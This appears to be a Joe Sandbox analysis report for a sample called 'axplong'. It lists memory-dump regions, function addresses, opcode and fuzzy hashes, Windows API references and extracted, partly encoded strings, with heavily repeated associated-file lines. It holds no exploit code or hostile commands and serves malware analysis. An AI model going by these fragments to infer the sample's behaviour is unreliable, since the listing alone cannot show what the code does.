Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: 855032916b4d152a1ed0ac9e025c70da84fa91f84aca543ec79071e843a6c9bb
Instruction ID: a61eeef935571a7b175a354bed9e550315152d5a71112f03e5f1e444a3ddf123
Opcode Fuzzy Hash: 855032916b4d152a1ed0ac9e025c70da84fa91f84aca543ec79071e843a6c9bb
Instruction Fuzzy Hash: 3BD02232562138A3CA122BA1BC088ADBB1DCB01B183604215FD08232208BA0BC506BD0

Function 00297D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00297EFF

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: b724f3c7a0a01b2488a4baaf9970fb72e8069f89307f20e7ba4ec0549a8ee404
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: F8518A7023C64A56DF388E3888967BE679A9F52300F1804AED4C2D7A82DB51DD74C761

Function 00264CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e732a4c5c11db6e0f1568f36b8086667a6fad47d995b2e1a14d1ee85571c4e6
Instruction ID: 2ae20414854b2502fa6e15125677f090b2c26e44e328441c6a1375f126fb4b69
Opcode Fuzzy Hash: 7e732a4c5c11db6e0f1568f36b8086667a6fad47d995b2e1a14d1ee85571c4e6
Instruction Fuzzy Hash: 1C225FB3F515144BDB4CCA9DDCA27EDB2E3AFD8314B0E803DA40AE3345EA79D9158A44

Function 002A6F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79bc32aaa14bb18bf8b88e5a776211f2f2e196aab9f344e494f444b3fcbbecab
Instruction ID: 52a8e791de7a82cac1975058e0ace52c612efb0d42c59a0ddc1b9a829e223e03
Opcode Fuzzy Hash: 79bc32aaa14bb18bf8b88e5a776211f2f2e196aab9f344e494f444b3fcbbecab
Instruction Fuzzy Hash: C7B17031224605DFD714CF28C886B657BE0FF46364F258658E8D9CF2A1CB75E9A1CB44

Function 00264AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0c9c4f8a78694f65250f25cb624d08e4c03735635e09a717ed3d66db51cce7b
Instruction ID: c420b35cf75ee9713ca7e194299079c3a80abc20ee6b1cf22838a1eca98eacce
Opcode Fuzzy Hash: f0c9c4f8a78694f65250f25cb624d08e4c03735635e09a717ed3d66db51cce7b
Instruction Fuzzy Hash: DE51B1706187D18FC319CF2D851563ABBE5AF95300F484A9EE0DA87292D774DA84CB92

Function 002A777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 028e9ba5a7dfa204238625c5221f391da61adb7e497df2d55f80c9576fb19ee3
Instruction ID: 1ceb7502b68dd90f76642d5297faa17dcabb8db2d51a0feba012144f8a3fca5d
Opcode Fuzzy Hash: 028e9ba5a7dfa204238625c5221f391da61adb7e497df2d55f80c9576fb19ee3
Instruction Fuzzy Hash: 6721B673F204394B770CC47E8C5727DB6E1C68C641745423AE8A6EA2C1D96CD917E2E4

Function 002A765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bca478f0211aec6be83fd45aac3cc98212318f7afd439f27c6a8750fcb31154f
Instruction ID: 981486c4f6ca66f03ab7e18383f16c629dc81e10943a18b05bd0b74b106b5850
Opcode Fuzzy Hash: bca478f0211aec6be83fd45aac3cc98212318f7afd439f27c6a8750fcb31154f
Instruction Fuzzy Hash: 3C118A23F30C255B675C817D8C172BAA5D6DBD825071F533AD826EB384E994DE23D290

Function 002A8720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 535c16cd2d5143197c668350b24ecfc2f77d0f3f6da48b6e4f4fd1dab8d68156
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: BE11087F22014387D605CE2DCDF8AB6E796EAC7321B3C437AD1424B758DE229965D900

Function 0029645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53b8a5831ee7bfbc421d4f0d823ba6c786e0f084101bfa19a5bc70530d17cd87
Instruction ID: f4c94418ada08c181d1439350fc389d04df81a6ab569751200a3d571bdc39a66
Opcode Fuzzy Hash: 53b8a5831ee7bfbc421d4f0d823ba6c786e0f084101bfa19a5bc70530d17cd87
Instruction Fuzzy Hash: B8E08C30161A486FDF357F55CC19A4C3BAAEB01344F006801FC0886222CB35ECE1D980

Function 0029A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 5053c50f94d750bb1c1e3c081c6c85a37f9d5706f0a9dd0de330138a34242646
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 00E04632921228EBCB15DB88890498AF2ACEB48B00F254096B505D3240C2B0DF00CBD0

Function 00272E20 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON

Download Yara Rule

Strings

8KG0fymoFx==, xrefs: 00272EC7
HBhr, xrefs: 0027378F
246122658369, xrefs: 002733D4
WGt=, xrefs: 002733BA
stoi argument out of range, xrefs: 00274269
Fz==, xrefs: 0027369E
invalid stoi argument, xrefs: 0027425A

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
API String ID: 0-2390467879
Opcode ID: 2e1359996050e3c48d21e3e8de08770626286a2b2364b1646dac5e105f3ccb24
Instruction ID: ee4cd17ccec1370c3b9ec0cea42798354d9b7e9f52ed67f378aedabdf422bcaa
Opcode Fuzzy Hash: 2e1359996050e3c48d21e3e8de08770626286a2b2364b1646dac5e105f3ccb24
Instruction Fuzzy Hash: CC02E571920248DFEF14EFA8CC59BDE7BB5EF05304F508158E809A7282D7759A94CFA2

Function 00262E80 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00262F1F
GetCurrentThreadId.KERNEL32 ref: 00262F3E
__Mtx_unlock.LIBCPMT ref: 00262F8C
__Cnd_broadcast.LIBCPMT ref: 00262FA3
__Mtx_unlock.LIBCPMT ref: 002630B5
GetCurrentThreadId.KERNEL32 ref: 002630F2
__Mtx_unlock.LIBCPMT ref: 0026315B

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: 081944a9f13cf8815e9191d87f9d2b9f26459157d4a7b3adc6e95e73e4b9c832
Instruction ID: 971dba9e9cfaa69e05bd703cf11af34aca28655ee7209b92aefafd3a3f5607f6
Opcode Fuzzy Hash: 081944a9f13cf8815e9191d87f9d2b9f26459157d4a7b3adc6e95e73e4b9c832
Instruction Fuzzy Hash: 0FA1D0B0A206069FDB11DF74C944B6AB7B8FF15320F50816DE819D7681EB31EA68CB91

Function 00277870 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 123COMMON

Download Yara Rule

APIs

__Cnd_unregister_at_thread_exit.LIBCPMT ref: 0027795C
__Cnd_destroy_in_situ.LIBCPMT ref: 00277968
__Mtx_destroy_in_situ.LIBCPMT ref: 00277971

Strings

@y', xrefs: 0027794A
d+,, xrefs: 00277904, 00277912, 0027790A
'k'd+,, xrefs: 00277879, 0027790B

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
String ID: 'k'd+,$@y'$d+,
API String ID: 4078500453-2368335016
Opcode ID: ac1e791b4c59f83947b5a6c93fa7eadeb8a5fbc3a2889d20e6c904322144c52a
Instruction ID: 374eac08bd8a581c3066eb34f711cb83e8f1a9ae076c0070070ac064eb93b578
Opcode Fuzzy Hash: ac1e791b4c59f83947b5a6c93fa7eadeb8a5fbc3a2889d20e6c904322144c52a
Instruction Fuzzy Hash: B531E5B29247059FD720DF64D845B66B7E8EF14310F104A3EE64DC7241E771EA64CBA1

Function 002970C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 0029710B

Strings

.exe, xrefs: 00297118
.com, xrefs: 0029714B
.bat, xrefs: 0029713A
.cmd, xrefs: 00297129

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 1a33a2fb1b44e1e9a035e745f62922f48edbc7f076e30b0c44f88e751962f61c
Instruction ID: ed1f7ad0e04541055b4a9cc29d3d35b4770bbffb823c8360d2a746843a0b5635
Opcode Fuzzy Hash: 1a33a2fb1b44e1e9a035e745f62922f48edbc7f076e30b0c44f88e751962f61c
Instruction Fuzzy Hash: 6501C827638717276E196819AD0277B17989B83BB4B15002EF948F72C1DE44EC2245A0

Function 00262670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00262806
___std_exception_destroy.LIBVCRUNTIME ref: 002628A0

Strings

P#&, xrefs: 002627BE, 00262899
P#&, xrefs: 00262811

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
